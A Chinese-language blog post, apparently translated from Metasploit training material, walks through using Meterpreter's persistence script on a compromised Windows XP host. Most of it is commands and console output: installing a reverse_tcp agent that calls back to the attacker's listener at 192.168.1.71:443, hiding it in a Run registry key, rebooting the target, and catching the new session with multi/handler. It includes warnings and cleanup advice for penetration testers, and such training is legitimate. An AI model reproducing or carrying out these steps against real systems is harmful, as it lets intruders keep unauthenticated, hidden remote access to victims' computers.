不乱于心,不困于情。
不畏将来,不念过往。如此,安好。

METERPRETER SERVICE

了解METASPLOIT METERPRETER

在完成了开发系统的所有艰苦工作之后,通常最好将自己放回到系统中以供以后使用。这样,如果您最初利用的服务已关闭或打补丁,您仍然可以访问系统。Metasploit有一个Meterpreter脚本persistence.rb,它将创建一个Meterpreter服务,即使重新启动远程系统,该服务也可以使用。

在继续进行任何操作之前,这里先警告一句。此处显示的持久化Meterpreter不需要身份验证。这意味着任何获得该端口访问权限的人都可以访问您的后门!如果您正在进行渗透测试,这不是一件好事,因为这可能会带来很大的风险。在现实世界中,请务必格外小心,并在订婚后一定要自己清理。

最初利用主机后,我们使用-h开关运行持久性以查看哪些选项可用:

meterpreter > run persistence -h

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching exploit/multi/handler to connect to the agent
    -L   Location in target host to write payload to, if none %TEMP% will be used.
    -P   Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T   Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i   The interval in seconds between each connection attempt
    -p   The port on which the system running Metasploit is listening
    -r   The IP of the system running Metasploit listening for the connect back

我们将配置持续的Meterpreter会话,以等待用户登录到远程系统,并尝试每5秒在端口443的IP地址192.168.1.71上重新连接回我们的侦听器。

meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.71
[*] Creating a persistent agent: LHOST=192.168.1.71 LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 613976 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\yyPSPPEn.vbs
[*] Agent executed with PID 492
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr
[*] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/persistence/XEN-XP-SP2-BARE_20100821.2602/clean_up__20100821.2602.rc
meterpreter >

请注意,脚本输出为您提供了在完成后删除持久性侦听器的命令。确保记下它,以免在系统上留下未经身份验证的后门。为了验证它是否有效,我们重新启动远程系统并设置有效负载处理程序。

meterpreter > reboot
Rebooting...
meterpreter > exit

[*] Meterpreter session 3 closed.  Reason: User exit
msf exploit(ms08_067_netapi) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.71
LHOST => 192.168.1.71
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.71:443
[*] Starting the payload handler...

当用户登录到远程系统时,将为我们打开一个Meterpreter会话。

[*] Sending stage (748544 bytes) to 192.168.1.161
[*] Meterpreter session 5 opened (192.168.1.71:443 -> 192.168.1.161:1045) at 2010-08-21 12:31:42 -0600

meterpreter > sysinfo
Computer: XEN-XP-SP2-BARE
OS      : Windows XP (Build 2600, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter >
赞(0) 打赏
未经允许不得转载:seo优化_前端开发_渗透技术 » METERPRETER SERVICE

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏